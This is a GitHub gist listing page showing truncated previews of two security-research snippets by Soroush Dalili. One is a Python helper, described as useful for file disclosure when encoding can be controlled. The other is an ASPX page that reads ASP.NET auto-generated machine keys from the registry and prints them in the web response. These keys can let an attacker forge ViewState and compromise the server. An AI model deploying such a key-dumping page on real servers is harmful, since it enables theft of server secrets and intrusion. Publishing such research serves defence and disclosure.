Skip to content

Instantly share code, notes, and snippets.

💭
< ⊙ ͜ʖಠ />

Soroush Dalili irsdl

💭
< ⊙ ͜ʖಠ />
Block or report user

Report or block irsdl

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
@irsdl
irsdl / iso-8859-1_to_binary.py
Last active Mar 19, 2018
Convert from iso-8859-1 to binary
View iso-8859-1_to_binary.py
# Convert from iso-8859-1, utf-8ed to binary!
# Useful for file disclosure when encoding can be controlled
# The following C# code shows an example (result is iso-8859-1, utf-8ed!):
###string encoding = "iso-8859-1";
######string sourceFile = @"Newtonsoft.Json.dll";
######
######public void test()
######{
#########System.Text.Encoding myEncoding = Encoding.GetEncoding(encoding);
#########String sourceFilePath = Directory.GetCurrentDirectory() + @"\" + sourceFile;
@irsdl
irsdl / machineKeyFinder.aspx
Last active Jun 27, 2019
To find validation and decryption keys when AutoGenerate has been used in Machine Key settings
View machineKeyFinder.aspx
<%@ Page Language="C#" %>
<%
// Read https://soroush.secproject.com/blog/2019/05/danger-of-stealing-auto-generated-net-machine-keys/
Response.Write("<br/><hr/>");
byte[] autoGenKeyV4 = (byte[]) Microsoft.Win32.Registry.GetValue("HKEY_CURRENT_USER\\Software\\Microsoft\\ASP.NET\\4.0.30319.0\\", "AutoGenKeyV4", new byte[]{});
if(autoGenKeyV4!=null)
Response.Write("HKCU\\Software\\Microsoft\\ASP.NET\\4.0.30319.0\\AutoGenKeyV4: "+BitConverter.ToString(autoGenKeyV4).Replace("-", string.Empty));
Response.Write("<br/>");
byte[] autoGenKey = (byte[]) Microsoft.Win32.Registry.GetValue("HKEY_CURRENT_USER\\Software\\Microsoft\\ASP.NET\\2.0.50727.0\\", "AutoGenKey", new byte[]{});
if(autoGenKey!=null)
You can’t perform that action at this time.